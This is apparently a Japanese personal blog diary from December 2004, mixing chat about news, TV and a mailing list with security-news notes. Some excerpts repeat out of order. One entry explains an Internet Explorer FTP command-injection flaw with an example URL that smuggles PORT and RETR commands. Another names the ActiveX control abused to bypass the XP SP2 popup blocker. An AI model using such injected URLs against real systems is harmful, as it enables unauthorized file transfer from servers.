```textile今年11月、2人の女子大生がlivedoor Blogで、「クリスマスまでに彼氏を作る!」と宣言してブログを立ち上げた。作者は、来年大学を卒業して大手出版社の系列企業に就職する“さきっちょ”さんと、慶応義塾大学一年生の“はあちゅう”さんの2人。ブログのタイトルは「* ♪さきっちょ&はあちゅう♪の悪あが記
」とつけた。“モテない女性”が、彼氏を作るまでの奮闘ぶりをブログにつづる。そんな内容だったが、すぐにネット上で「面白いブログがある」と噂が広まった。```“モテない女性”には見えないですよねー。面白いし。(^-^; 俺も「○×までに彼女を作る!」と宣言したいところだけど、いつまで、にしようかな。えーっと、20代が終わる前までに、かな?(←リアル過ぎ(笑))
textile昨日 12月8日(水) 一日で openmyaMLに流れたメールの数なんと、830通!一日ですよ?一日。まぢでありえねー。(笑) ふつーのMLがひょっとしたら生涯たどりつけないかも知れない流量を一日で。(汗) いったい何人の人が溺れてるんだろうか、今。(^-^;[セキュリティ] * 主要Webブラウザにポップアップウィンドウ偽装の脆弱性、フィッシング詐欺につながるおそれ (ITmedia)
textileデンマークのセキュリティ企業Secuniaは12月8日、Internet Explorerをはじめ複数のWebブラウザに、ポップアップウィンドウの内容を偽装される恐れのある脆弱性が存在するとし、アドバイザリを公開した。この脆弱性は広範なWebブラウザに存在している。少なくとも、IE 5.01/5.5/6(Windows XP Service Pack 2を適用していても影響を受ける)のほか、Mozilla 1.7.3、Firefox 1.0、Opera 7.54、Safari 1.2.4、Konqueror 3.2.2-6で確認されたほか、他のバージョンでも影響を受ける恐れがあるという。Secuniaアドバイザリ
- Microsoft Internet Explorer Window Injection Vulnerability
- Mozilla / Mozilla Firefox Window Injection Vulnerability
- Netscape Window Injection Vulnerability
- Konqueror Window Injection Vulnerability
- Opera Window Injection Vulnerability
- Safari Window Injection Vulnerability
Secunia脆弱性のデモ
- Multiple Browsers Window Injection Vulnerability Test
どのようなステップで脆弱性が発現するのか適当に和訳:ユーザが悪意あるサイトを訪問します。そこにある信頼されたサイトへのリンクをクリックします。(信頼されたサイトが新しいウィンドウで表示されます。)信頼されたサイトがポップアップウィンドウを表示しようとした時、悪意あるサイトはそのウィンドウをハイジャックして任意のコンテンツを表示することができます。最近は、主要ブラウザ全部で見つかる!とか多いですねー。(汗Internet Explorer に関しては、もはや修正されてない問題点がいくつあるのかさえ、誰も把握できない状況になってきてしまったかも。(^-^; 「Unpached Internet Explorer Bugs」みたいなサイトって、どこかにフッカツしたんでしたっけ?(←ちゃんと更新されてるやつ。)[雑談] * ブログで会社をクビに——米国で解雇例が続出
ブログに掲載した内容が原因で、解雇されてしまった例が3例挙がっていました。例えば、
textileハンスコム氏は今年の10月、…派遣社員として、…マイクロソフト社の敷地内で働いていた。ある日、当時最新のマシンだった『Power Mac G5』が数台、会社に到着した。これを見て、マイクロソフト社が米アップルコンピュータ社のハードウェアを使おうとしているとは面白いと考えたハンスコム氏は、写真を撮り、自分のブログに掲載した。うーむ、実際は『写真を撮影した場所、および自分の職場との位置関係』の記述の方が問題になったのかも知れませんけども、ちょっと意味深な感じです。(^-^; ただし、マイクロソフトは、『社員の多くがブログを立ち上げており、同社の機密保持協定に従うかぎり、会社側もブログ運営を支持している』とも言っているようですね。皆さんの会社では大丈夫ですか?ブログ。[雑談] * 「あいつ怪しい」元警察トップに職質
textile国家公安委員長を務めた白川勝彦元衆院議員(59)が、東京・渋谷の路上で警視庁渋谷署員に職務質問を受けていたことが6日、分かった。…白川氏は渋谷署長に抗議するため、警察官とともにタクシーで同署に乗り込んだ。同署で96〜97年に国家公安委員長を務めた経歴を明かしたが、中堅幹部は白川氏と気付かず、その後、副署長が初めて「白川先生」と気付いたという。「私は元国家公安委員長だ」と言われた警官は、きっと、「また頭のおかしい奴が来たな」と思ったことでしょうね。想像すると笑ってしまいますね。(^-^;この経験を受けて、この方は警鐘を鳴らしています:
textile自由主義を政治理念とする白川氏は「数十分も私の行動の自由を奪い、体を触るような職務質問は警職法からみて違法だし、自由主義社会で許されるはずがない。このような横暴な職質は日常的に行われている可能性があり、怒って抵抗して公務執行妨害で逮捕される人が出る危険性があり、恐ろしいことだ」と指摘。そう言えば、秋葉原での職質も話題になっていましたが、何だか最近、厳しいんですかね?[雑談] * TB、年賀状に二次元コードが入れられる「暗号素材集」を開始
```textileテンプレート・素材のダウンロードサイト「 テンプレートBANK 」において、「年賀状プリント決定版2005」の新コンテンツとして、二次元コードを使用した「 * おもしろ暗号メッセージ素材集
」を開始した。おもしろ暗号メッセージは、メッセージを二次元コード化したものを年賀状に印刷し、受け取った人が携帯電話で読み取るとメッセージが表示される仕組み。内容は、他人に見られたくない秘密のメッセージやひとことメッセージ、おみくじ、絵文字など、計57種類。```私の携帯にはカメラついてないので、これが送られてきたらきっと悲しい気分になります。(笑) 実物を見てないので分かりませんが、QRコードですかね? DoCoMo の「* QRファクトリー
」とか使えば、定型ではない自分だけのメッセージ!が作れるかも。トライしてみては?(←私宛て以外の年賀状で!(^-^;)[IT] * 「思考によるコンピュータの操作」に成功 (ITmedia)
textile4人の人間が、自らの思考と電極の付いた「思考の帽子」を使ってコンピュータを操作することに成功した。米国の研究者らが12月6日に明らかにした。…実験の間、4人の被験者は、64個の電極が付いた、脳の活動を記録する帽子を頭にかぶってビデオ画面に向き合った。…ある程度の練習は必要だったが、4人の被験者は画面上でカーソルを2次元方向に動かせるようになったとウォルポー氏とマクファーランド氏は語る。今までのような手術による電極の埋め込みとか無しに、特殊な帽子をかぶることだけで脳波による操作ができるんだそうです。ほー。もっともっと進歩すれば、やがてキーボードやマウスなしにマシンが操作できるようになるんでしょうかね。[IT] * 新作のWebブラウザーは「Sleipnir」を超えるものに
textile人気Webブラウザー「Sleipnir」作者であるYasuyuki Kashiwagi氏が、新作Webブラウザーの開発を開始したと自身のホームページ上で公表した。「Sleipnir」ユーザーからの要望を取り入れながら、約半年後の公開を目指しているという。…同氏は11月16日にパソコン盗難の被害に遭い、「Sleipnir」を含む同氏作のソフトのソースコードが全て失っていた。逆境に負けずにより素晴らしいものを目指せるなんて、すばらしいです。頑張って頂きたいですね! (前の経験を踏まえて、今度はソースコードは分散して保存しとかなきゃですね。暗号化して P2P に放流しちゃうとか?(^-^;)関連: * FrontPage - Sleipnir
[雑談] * 今回は見やすい!「初心者にぜひ」…流星群 (ZAKZAK)
textile12月13日夜に活動が活発化するふたご座流星群を全国で観察し、結果を報告してもらおうと、国立天文台は…サイトを開設、参加を呼び掛けている。…日没後、東から上って午前2時ごろ天頂付近を通り、西の空へ移るふたご座から放射状に流れる。理想的な条件の下では流星が1時間に50個程度と多く、また、ゆっくりと流れることから肉眼で観察しやすい。街の明かりが目に入らない暗い場所が最適。今年は12日が新月で、邪魔な光が少ないという。12月13日から14日にかけての夜に最も多くの流星が出現するそうです。たまには、星を見ながらまったり KoIP でもしてみては? >誰となく関連: * 「ふたご座流星群を眺めよう」キャンペーン (国立天文台)
[雑談] * サイバー恋愛に未練は禁物 (Wired News)
**# ずきん (2004/12/09(Thu) 18:34) **
やまがたさめの為の記事でふか? なんですと? どれどれ。
textileしかし、好奇心は消えない。最後に彼と話をしてからもう5年も経つのに、ときどき、気分が落ち込むと私は彼のことを検索してしまう。かと言って、電話をかけたりはできない——そんなことをすれば信頼を裏切ることになるし、相手の決心や願いを守れない人間だと思われてしまうからだ。その代わり、私は彼や彼の息子、病気がちだった母親について記事がないかと、地元のニュースを検索している。ずきんさん、こんな気分になったことあるんですね?[Y/y] (笑)うーむ、俺の場合は まずネット恋愛の相手を見つけないと♪(↑いや、ネット限定じゃなくて良いんですが。(笑))『深夜に電子メールを送りたいという誘惑に屈しない』ですか。屈してません?>誰となく。(^-^;[雑談] * 「クリスマスまでに彼氏を作るブログ」作者の苦労 (ITmedia)
```textile今年11月、2人の女子大生がlivedoor Blogで、「クリスマスまでに彼氏を作る!」と宣言してブログを立ち上げた。作者は、来年大学を卒業して大手出版社の系列企業に就職する“さきっちょ”さんと、慶応義塾大学一年生の“はあちゅう”さんの2人。ブログのタイトルは「* ♪さきっちょ&はあちゅう♪の悪あが記
」とつけた。“モテない女性”が、彼氏を作るまでの奮闘ぶりをブログにつづる。そんな内容だったが、すぐにネット上で「面白いブログがある」と噂が広まった。```“モテない女性”には見えないですよねー。面白いし。(^-^; 俺も「○×までに彼女を作る!」と宣言したいところだけど、いつまで、にしようかな。えーっと、20代が終わる前までに、かな?(←リアル過ぎ(笑))
2004/12/10(金)金曜日ー。(+1)
[雑談] * 相対性格占い
◆* 7a69Adv#15 - Inyección de comandos FTP en Internet Explorer
読めないけど、適当に解釈してみる:
[雑談] * ノートPCの発熱で生殖能力低下 (CNET Japan)
携帯電話やら、ノートPCやら、現代社会には危険がいっぱいですね。(^-^;[雑談] * なぜなぞ科学: 方向音痴の人、どこが違う (毎日新聞)
[雑談] * 国立国会図書館:ホームページを収集、保存へ (毎日新聞)
[雑談] * 世界一高い橋、雲間の343メートル 仏南部ミヨー
textileあなたは、**思いやりに欠ける男性** と判定されました。 わがままなあなたは世の中が自分中心に動いていると思いかみがちなところがあります。自分以外は他人。他人のことなどどうでもよい、などという考えが見え隠れしています。自分かわいさから冷酷に他人を見捨てることは「個の保存」の法則から言って必ずしもまちがいではないのですが、平和な世の中ではそのような態度は疎んじられます。周りの人や弱い者への労(いたわ)りや共感・同情などをできるよう気にかけてみてください。ぐはっ。気をつけまぁーす。(^-^;[雑談] * 「おれおれ」など…命名「振り込め詐欺」被害222億
textile「振り込め詐欺」という新たな名称は、最近は「おれ、おれ」と身内を装う初期の手口がほとんど見られなくなっていることを受けて決定した。漆間巌・同庁長官も9日の定例会見で、「安易に振り込んではいけない、という意味で、この名称にした。誰にも相談せず、慌てて振り込まないようにしてほしい」と語った。ふ、振り込め詐欺?!(笑) まぁ分かりやすいのかも知れませんけど。そういえば、(これとは全然関係ないけど、)名称変更と言えば、『新潟大震災』って誰も使ってない気が。(^-^;[セキュリティ] * Microsoft Internet Explorer FTP Command Injection Vulnerability (Secunia)
◆* 7a69Adv#15 - Inyección de comandos FTP en Internet Explorer
読めないけど、適当に解釈してみる:
textile"ftp://ftpuser:ftppass@server/directory" にアクセスした場合、Internet Explorer は下記の FTP コマンドを発行します(正常時): USER ftpuser PASS ftppass CWD /directory/ここで、"ftp://ftpuser:ftppass@server/directory**%0d%0a**somecommand**%0d%0a**" にアクセスした場合、%0d%0a(改行コード) が展開され、下記のようにURL内で指定された任意のFTPコマンドが挿入されてしまいます: USER ftpuser PASS ftppass CWD /directory somecommand /例えば、"ftp://server/%0d%0aPORT%0d%20a,b,c,d,e,f%0d%0aRETR%20/file%0d%0a" のようなURLにアクセスさせることでファイルを勝手に受信させたりすることができるかも知れません。Microsoft Windows 2000 SP4 / XP SP2 上の Internet Explorer 6.0 (すべてのパッチ適用済み)に影響することが確認されています。Internet Explorer で、ftp:// なパスの中の改行コードをそのまま展開してしまうため、任意のFTPコマンドを指定して実行させることができる、という話。[IT] * おバカUSBパーツ サンコー、“やや実用的”なUSB灰皿 (ITmedia)
textileサンコーは、USBバスパワー駆動対応の灰皿「USB灰皿」を発売した。価格は2980円。…USB灰皿は、USBポート接続にて駆動するファンを内部に搭載し、たばこのの煙を吸い込む仕組みとなっている。厚さ1センチの活性炭フィルターが2個搭載される。マシンの近くでタバコを吸えと?(中が黒くなるよぅ。) うちのビルは十分な排煙設備の用意がある場所以外は全館禁煙です。・・・ん? 十分な排煙設備? ま、まさかこの灰皿も排煙設備か?(←そんなわきゃない。(笑)) ちなみに私はタバコ吸いません。[セキュリティ] * マイクロソフト、5つのWindowsパッチリリースを予告
textileMicrosoftは米国時間9日、同社が合わせて5つのWindowsパッチを来週リリースする計画であることを発表した。…今回発表された情報によると、5つのWindowsパッチは12月14日に公開される予定。…14日に発表されるWindowsの欠陥のなかには、「緊急」に該当するものは1つも含まれておらず、最も深刻度が高いものでも「重要」レベル(同社の定義で上から2番目)だと、同社の告知には記されている。日本語の「マイクロソフト セキュリティ情報の事前通知」は、まだ11月のままみたい。関連: * Microsoft Security Bulletin Advance Notification (Microsoft)
[雑談] * ノートPCの発熱で生殖能力低下 (CNET Japan)
携帯電話やら、ノートPCやら、現代社会には危険がいっぱいですね。(^-^;[雑談] * なぜなぞ科学: 方向音痴の人、どこが違う (毎日新聞)
textile正確に道をたどれた上位4人と、下位4人を比較すると、下位の人は道の把握に役立つ特徴のある目印となる建物、道路や交差点の形、商店名などを認識するのが下手だった。その代わり「親子が横断歩道を渡っていた」など道の把握には役立たないことに目を奪われていることが多かった。…ところで、方向音痴は女性に多いのか。「空間認知能力に多少、性差があるという研究はあるが、はっきりと分かっていない。目印探しのコツは少し心がければ向上する。自分を方向音痴とあきらめないことですね」だそうです。諦めないようにね! >ずきんさん (←指名(笑))[雑談] * 安倍なつみの盗作に隠された事実…
textile簡単に言うと、今回の盗作を発表した、『アップフロントエージェンシー』による、『安倍さん潰し』であると、業界関係者は判断しているのです。どうして、自らの事務所の稼ぎ頭である安倍さんを潰すのかという疑問も、答えはあるのです。それは、『安倍さんが独立を考えていた』からです。ま、まぢっすかー? うーむ、、、ネタ元: * hardでloxseな日々
[雑談] * 国立国会図書館:ホームページを収集、保存へ (毎日新聞)
textile国立国会図書館がホームページ(HP)を収集、保存し、一般に閲覧させることの是非を審議してきた同館の諮問機関「納本制度審議会」は9日、収集を認める答申をした。…情報伝達手段としてHPの利用が増えているのに、日々の更新で内容が消えていくため、同館が文化財として保存することの是非を02年に諮問していた。答申は(1)収集するHPは内容によって選別はしない(2)HP開設者が拒んだ場合は収集しないが柱。日々のHPを逐一収集するのは不可能なので、収集期間や頻度の検討など具体化に向けた作業を始める。同館によると、国内発を示す「.jp」で終わるサイトを収集した場合、700メガバイトのCD−ROM2万枚が必要だが、収集・保存に支障はないという。1回の保存で2万枚ですかね? 『収集・保存に支障はない』と言えるような量じゃないような。(^-^; それに、閲覧する人、いるんでしょうかね。(笑) どうやって欲しいページのありかを探すんだろう? 全文検索もできないんだろうから、うーん、URL が一覧されたリストから探し出すのかな?(汗関連: * 国会図書館 納本制度審議会
[雑談] * 世界一高い橋、雲間の343メートル 仏南部ミヨー
textileフランス南部ミヨーのタルン川が流れる峡谷で9日、雲間にそびえる高架橋が完成した。これは最近完成したもので、7本の橋脚があり、高さ343メートル。世界で最も高い橋とされる。高さ343メートルってことは、東京タワーより高いってことですかい?(汗 いくら峡谷とは言え、こんな高い位置に橋かけたりするものなんですねー。でも、面白そうだなぁ。通ってみたい!
2004/12/11(土)土曜日ー。(めずらしく。)
[雑談] * 二日酔いしない飲酒量は計算式でわかる! (日経BP)
実は体重が・・・ゴホゴホゴホ。あー、何でもないです。(笑)飲み過ぎには気をつけましょう♪[セキュリティ] * 「1万人のハッカーを“追跡”して,ネットのリスクを予測する」——米Cybertrust
Windows XP SP2 の新機能である“ポップアップブロック(POPUP BLOCKER)”の制限を回避して、ポップアップウィンドウを表示できてしまう脆弱性が見つかりました。デモ⇒
日本語版Windowsで試してみましたが、フィルタレベル『高: すべてのポップアップをブロックする』に設定してもポップアップが表示されてしまいますねー。(Office に付属する DHTML Edit Control (clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A) が悪用されてる?ようですね。)# ちなみに、Norton Internet Security の“ポップアップウィンドウ遮断”も有効になってるのですが、これも効果ないですね。[雑談] 電話番号通知の偽造@memo-ML◆* 警察の電話偽装表示、刑事名乗り「振り込め詐欺」未遂 (読売)
[雑談] * 「IEでしか読めないページ,Windowsでしか使えないシステムは不適」,経産省が調達ガイドライン作成へ (IT Pro)
```textileユーザーの探したい用語を推測してくれる米Googleの新検索サービス「* Google Suggest
」のβ版が立ち上げられた。現在は英語のみ対象。このサービスでは検索ボックスに探したい用語の一部を入力すると、何を探したいのか推測してボックスの下に一覧を表示してくれる。```「openmy」まで入れたら、無事に「openmya」が補完されました。(^-^;
textile二日酔いしないための飲酒量(mL)=15 × 体重(kg) × 飲み始めてから翌朝までの時間(h)—————————————————————————————————————————————酒のエタノール度数(%) × 0.8アルコール度数の高いお酒をたーくさん飲んでる某"酒好きん"さんのことを考えました。仮説1.隠してるけど、実は! 毎日、二日酔いに苦しんでいる。仮説2.こんな一般的な計算式で推し量れるようなヤワな肝臓ではない。仮説3.
textileハッカーを“追跡”する方法については,…スタッフがハッカーのふりをしてIRCやチャットなどに参加して,情報を仕入れるという。「ひとりで4〜5人のハッカーを演じる。長期間演じていると,相手は自分を本物のハッカーだと思い,情報を教えてくれるようになる。『今度,このツールで攻撃しようと考えているんだ』といって,そのツールを見せてくれる場合もある」ま、こーゆー手段での情報収集も必要なのかも知れませんけどね。[セキュリティ] * HOW TO BREAK XP SP2 POPUP BLOCKER: kick it in the nut ! (Bugtraq)
Windows XP SP2 の新機能である“ポップアップブロック(POPUP BLOCKER)”の制限を回避して、ポップアップウィンドウを表示できてしまう脆弱性が見つかりました。デモ⇒
日本語版Windowsで試してみましたが、フィルタレベル『高: すべてのポップアップをブロックする』に設定してもポップアップが表示されてしまいますねー。(Office に付属する DHTML Edit Control (clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A) が悪用されてる?ようですね。)# ちなみに、Norton Internet Security の“ポップアップウィンドウ遮断”も有効になってるのですが、これも効果ないですね。[雑談] 電話番号通知の偽造@memo-ML◆* 警察の電話偽装表示、刑事名乗り「振り込め詐欺」未遂 (読売)
textile相手の電話に警察署の電話番号を表示させ、警察官からの電話と信じ込ませ、金をだまし取ろうとする事件が静岡県内であり、県警は新手の「振り込め詐欺」未遂事件として調べている。…会社員の携帯電話には、実際に同署の番号が表示されていた。…雑誌などには、番号の偽装を引き受ける業者の広告が掲載されており、同署は、犯人はこうした業者を利用したとみて調べている。という事件なのですが、
- 警察の電話偽装表示、刑事名乗り「振り込め詐欺」未遂 (読売)
textileNTTドコモとNTT東日本によると、携帯電話から番号を偽装してかけることは不可能だが、固定電話からは改造すれば、不可能とは言い切れないという。
- 振り込め詐欺:実在警察署の電話を携帯に表示、現金詐取 (毎日)
textileNTT西日本広報室は「偽装表示は聞いたことがなく、考えられない」と話している。という風に、NTT DoCoMo & NTT東日本 と、NTT西日本 で見解が違うということが話題になっていました。(番号の偽装なんてできるんですねぇ。偽装業者の広告なんてどんな雑誌に載ってるんだろ?(笑) )ネタ元: * [memo:7949] Re: 電話番号通知の偽装 by 福光さん
[雑談] * 「IEでしか読めないページ,Windowsでしか使えないシステムは不適」,経産省が調達ガイドライン作成へ (IT Pro)
textile経済産業省は特定のソフトウエアに依存しないことを目的としたシステム調達ガイドラインの作成に乗り出す。…具体的にはInternet Explorerでしか読めないActiveXコントロールを使用したページや,Windows用のクライアント・アプリケーションしか提供していない電子申請システムなどだ。こういったシステムは利用者の選択の機会を奪うとともに,ベンダー・ロックインを助長することになる。…オープンソースの採用を強制するものではなく,あくまで特定ソフトウエアへの依存を排除することを目的としたものになる見込みだ。ここで言う『特定のソフトウェアに依存しない』電子申請システムって、良くある Java を使ったやつのことですかねー? JRE 指定のが多いようですが、これ、Sun Microsystems に依存してるんぢゃないの?(←ちゃちゃ。(笑)) OS やブラウザだけが焦点なのかな。まぁ、言い出したらキリが無いもんね。(^-^;[雑談] * 渋谷の女子高生に流行っている言葉 (ビタミンX)
textile「おはよん様」「うるせーぺよんじゅん」など流行のヨン様を取り入れた言葉や、「もえもえ」「〜ですが何か?」という2ちゃんねるで見かけそうなネット言葉まで、いろんなネタをもとに新しい言葉を作り出す創造力はさすがという感じ。ほー。リストにある言葉、ほとんど分からないんですけど。(^-^; もうおぢさんだね。(涙[IT] * Google、目的の検索用語を推測してくれる新サービス (Google)
```textileユーザーの探したい用語を推測してくれる米Googleの新検索サービス「* Google Suggest
」のβ版が立ち上げられた。現在は英語のみ対象。このサービスでは検索ボックスに探したい用語の一部を入力すると、何を探したいのか推測してボックスの下に一覧を表示してくれる。```「openmy」まで入れたら、無事に「openmya」が補完されました。(^-^;
2004/12/12(日)日曜日ー。(トッポギ?)
[雑談] * 今年のベストサイトが決定! 「Web of the Year 2004」 受賞結果発表
11月にopenmyaMLでも話題になっていたですが、今日12月12日が初試験!だったんですねー。* まっちゃさん
が受験されたようです。合格してると良いですね♪
textileソフトバンク パブリッシング株式会社が発行する月刊インターネット情報誌「Yahoo! Internet Guide」は“今年のベストサイト”を一般投票により選出するコンペティション『Web of the Year 2004』の結果を発表します。…**<エンターテイメント部門>**1) ハンゲーム2) Yahoo!ゲーム3) あいのりお?!(^-^) URLとかが載ってないのは、2月号を買え、ということかな。[IT] * 三菱が作った20万円台前半の“ホームシネマDLP機”「LVP-HC900J」 (ITmedia)
textile三菱電機がホームシネマ向けの普及機として投入したDLPホームプロジェクター「LVP-HC900J」。DLP機としては破格の20万円台前半という実売で人気となっている注目機の実力をレビューで探ってみた。いくら安くなっても、映写するだけのスペースが無いもんなぁ...[雑談] * 「京都通」に1万人が挑戦・歴史文化の検定試験
11月にopenmyaMLでも話題になっていたですが、今日12月12日が初試験!だったんですねー。* まっちゃさん
が受験されたようです。合格してると良いですね♪
2004/12/13(月)月曜日ー。(明日、参加予定。)
[雑談] * 企業内個人向け生産性アセスメントサービス IPA (マイクロソフト)
にあるマイクロソフトの従業員行動分析サービスのWebページがありました。報告書のサンプル:
本当にテレビで見たとおりの内容でした。(汗⇒『開始時刻 9:44:22 終了時刻 9:44:50 立ち話 with 大木氏』
Microsoftさん、冒険してません?(笑) 良いんですか?この例示で。(^-^;⇒『アプリケーション:Excel、PowerPoint、Word、Access 内容:作業中のエラーによりアプリケーションの応答が無くなり、未保存部分や壊れたファイルの再度作成を行う 改善内容:「ドキュメントの回復」機能により、作業中に予期せぬエラーが発生した際、ファイルを安全に作業時の状態で保存ができる』経営者の気持ちは分かりますが、ここまでされたら・・・息がつまりますね。(汗[雑談] * livedoor スカイプ、ヘッドセットと通話チケット同梱のスタータキット
、* あいのりウラ話(瀬里葉の日記)
にあるマイクロソフトの従業員行動分析サービスのWebページがありました。報告書のサンプル:
- 行動観察データ例
http://www.microsoft.com本当にテレビで見たとおりの内容でした。(汗⇒『開始時刻 9:44:22 終了時刻 9:44:50 立ち話 with 大木氏』
- EOレポート(週間計)例
http://www.microsoft.comMicrosoftさん、冒険してません?(笑) 良いんですか?この例示で。(^-^;⇒『アプリケーション:Excel、PowerPoint、Word、Access 内容:作業中のエラーによりアプリケーションの応答が無くなり、未保存部分や壊れたファイルの再度作成を行う 改善内容:「ドキュメントの回復」機能により、作業中に予期せぬエラーが発生した際、ファイルを安全に作業時の状態で保存ができる』経営者の気持ちは分かりますが、ここまでされたら・・・息がつまりますね。(汗[雑談] * livedoor スカイプ、ヘッドセットと通話チケット同梱のスタータキット
textileライブドアは、P2P電話ソフト「スカイプ」とヘッドセット、固定電話へ約100分通話できる通話チケットをセットにした「livedoor スカイプ スターターキット」を12月17日より発売する。標準価格は3,129円。なるほど、こういう売り方になるわけですね。[雑談] * 五重塔の倒れぬ謎に迫る 模型使い、震度6の加振実験
textile地震や台風が多い日本で五重塔はなぜ倒れないのか——その謎に迫るため、五重塔の大型模型を使い、震度6程度の揺れを加えて変形などを調べる実験が、防災科学技術研究所で16日にある。…地震で倒れない理由としては、「柳に風」のように力を受け流す「柔構造説」などが唱えられてきた。柔構造は超高層ビルの耐震設計にも応用されているが、五重塔の強さの本当の理由は今でもよくわかっていない。おぉ、言われてみれば何で倒れないんだろう?! 神秘の力でしょーか。すごいっすね。[雑談] * 関係者の相関図エディタ@openmyaML
textile**関係者の相関図エディタ**MLのReferencesを辿って、誰が誰にレス返すのが多いか解析して相関図を作る。がんばればできそうな…。を読んでいて、ふと、(相関図は無理だけど、個人的に)『ヤマガタにレスを返してくれた人 ベスト10』を出してみたくなった(笑)ので、ちょっと算出してみました。ドキドキ。
textile■ヤマガタのメールに返信をくれた心優しい方どなたが何通HASEGAWA Yosuke <yosuke.hasegawa@xxxx>13Hirohisa Yamaguchi <umq.876@xxxx>9Tatsuya Ueda <tatsuya@xxxx>7Shota Wakazuki <shota-ml@xxxx>5bkbin005@xxxx5"IKEGAMI,Takeo" <tikegami@xxxx>5RYOUichi KIDa <ryou@xxxx>5ヤマガタ <yamagata@xxxx>4MYA <myrn@xxxx>4Hiro Yoshioka <hyoshiok@xxxx>3Mayumi N <nk_mr2002@xxxx>3ワニ <wani@xxxx>3kawa <kawakawa@xxxx>3松永 均 <open@xxxx>3"H.Machidori/待鳥" <machi@xxxx>3※"In-Reply-To:"のみ見ています。"References:"見ていません。まっちゃさんがいない!(>_<)のはそのためかな?お得意さまは大事にしなきゃ。メモメモ。(笑) この結果、本当に正しく出せてるか微妙。(^-^;ちなみに、、、
textile■ヤマガタが誰のメールに返信したかどなた宛に何通HASEGAWA Yosuke <yosuke.hasegawa@xxxx>16MYA <myrn@xxxx>10Tatsuya Ueda <tatsuya@xxxx>9まっちゃだいふく <ripjyr@xxxx>9Hirohisa Yamaguchi <umq.876@xxxx>9HASEGAWA Yosuke <hasegawa_yosuke@xxxx>8ワニ <wani@xxxx>5Hiro Yoshioka <hyoshiok@xxxx>4bkbin005@xxxx4ヤマガタ <yamagata@xxxx>4"IKEGAMI,Takeo" <tikegami@xxxx>4kawa <kawakawa@xxxx>4はせがわさんに計24通送って、そのうち13通だけ返信が貰えた、と。メモメモ。(笑)[雑談] * 森永が「男のためのアイス」を発売 (日経)
textile森永製菓は12月13日、男性向けのアイス「MEN'S バニラ」「MEN'S ローストアーモンド」を発表した。…同シリーズは、「男のためのアイス」がキーワード。パッケージは、黒を基調色として「フォーマル、高級、上質感が漂うデザインを採用した…大人の男がざくざく食べる、食べ応えのあるサイズ」ストロベリーとかの甘ぁーいアイスに心惹かれてしまう私は、男としてダメダメですか?(^-^;[TV][あいのり] #249 エスパーじゃないから・・・男5人、女3人でエチオピア縦断中。アフリカの安宿はひどいですねー。(宿よりもその後寄ってたキャンプ場の方がよっぽど健康的に見えますな。)アフリカ4カ国で瀬里葉はすっかりたくましくなりました。(^-^;おーせ、根はすごく良い子ですよね。ソルトがすっかり“切れキャラ”で定着させられてるから、イッチーとワゴンで自然な感じで笑ってる姿みたりすると、ちょっとびっくり。(笑)ヒデ「なんで告白できなかったんだ・・・」 かよー、迎えに来てあげてー。(^-^;イッチーが救急車で病院に。アメーバ赤痢。アフリカの旅はツライですね・・・。でも、これがキッカケで瀬里葉が、イッチーの大事さに気づくかも?!【来週の予告から】来週もソルトがキレるらしい。(汗瀬里葉「気持ちフラフラしてきちゃって。」 ←なにぃー!!歯医者「今回のこの旅終わりにしようと思うの。」 ←くそぅ。歯医者、邪魔するなー。(笑)⇒* 今週のあいのり
、* あいのりウラ話(瀬里葉の日記)
2004/12/14(火)火曜日ー。(頑張ります。)
[雑談] * 美人OL激白! エンジニアのココが好き☆キライ (Tech総研)
ずきんさんに* 捧げて貰いました
。(笑)
ずきんさんに* 捧げて貰いました
。(笑)
textileナミコ:そういえば前の会社のとき、朝出社したらデスクにオレンジジュースが置いてあって、「なんだろう??」と思ったら「最近お疲れモードだね。これ飲んで」っていうメールがきたことがあるんです。カオリ:ええ〜!なんでメールなの??(←それよりオレンジジュースに突っ込んで!)。 ナミコ:髪を切った翌日、「髪形変えたね、でも前のほうが似合ってたと思うよ」ってメールがきたこともあります。 ルミコ:そ、そういうことは、直接言ってくれればいいのに……。 えぇー?!! メールじゃダメなんですか?(←逆にびっくり。(笑))こんなエンジニアさん、素敵ぢゃん。精一杯善処してると思うけど。(←俺もズレてる?(^-^;)[セキュリティ] * 年末だからこそ見直したいセキュリティ対策 (ITmedia)
はい。毎年、年末年始は狙われ時?!ですから、気を引き締めて行きましょう♪[雑談] * Yahoo! BBの顧客情報に関するお知らせ 2004/12/13 (ソフトバンクBB)
textile本年12月10日夕刻に、週刊新潮誌(新潮社)より(1)氏名、(2)住所、(3)電話番号、(4)携帯電話番号が記載されたYahoo! BBの会員情報と称する紙データ1500件が持ち込まれました…また、ほぼ同時刻に、週刊フラッシュ誌(光文社)より、Yahoo! BBの会員情報と称する5000件のデータを入手したとの連絡を受けました…さらに、本日15時20分ごろ、週刊新潮誌から、30000件のデータを入手したとの連絡を受けました…一度流出した情報はもう制御が利かないということですわな。発表によると、いずれも2003年3月時点の約86000件のデータ(2度目の情報流出(2004/11/30発表))の一部のようですね。[雑談] * 送信者認証技術の導入におけるレコメンデーション (Sendmail)
openmyaMLで紹介(byまーさん)されてました。最近 話題の“送信者認証技術”について、送信者、受信者、中継点それぞれへの「こうしましょうよ」という提言がまとめられています。[雑談] * 大量のメールをすばやく処理するには? (日経BP)
メールは分類しましょう、各業務用のアドレスなどについては運用ルールを決めましょう、というホワイトカラー(笑)にとっては、当たり前過ぎるお話。@openmyaML[雑談] * mixi中毒度チェック
textilemixi_qesのあなたの回答結果は 11点 ですた。この得点は、4199件中、3591位でした。また平均点は29.8759228387711点です。全然、中毒ではない、ということですかね。(^-^)[雑談] * 日本放送労働組合Q&A
textileQ.NHKの会長はどうして責任を取って辞めないのですか?connect24hで話題になってました。ちょっと笑ってしまった・・・。(^-^;2004/12/15(水)水曜日ー。(山形の地酒 『くどき上手』)
[セキュリティ] * Symantec Windows LiveUpdate NetDetect Privilege Escalation (Secunia)
要点を適当に和訳:```textileSymantec Windows LiveUpdate に、ローカルユーザが権限昇格を行うことができる脆弱性が存在する、ということを * Secure Network Operations
